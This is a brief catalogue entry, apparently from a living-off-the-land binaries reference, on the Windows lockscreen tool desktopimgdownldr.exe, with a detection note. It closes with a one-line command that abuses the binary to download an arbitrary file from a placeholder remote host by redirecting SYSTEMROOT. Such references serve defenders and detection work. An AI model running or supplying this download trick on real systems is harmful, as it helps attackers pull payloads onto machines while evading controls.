~/ cat Desktopimgdownldr.exe.md █
Windows binary used to configure lockscreen/desktop image
Paths:
c:\windows\system32\desktopimgdownldr.exe
Detection: desktopimgdownldr.exe that creates non-image file Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
Download
Downloads the file and sets it as the computer’s lockscreen
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr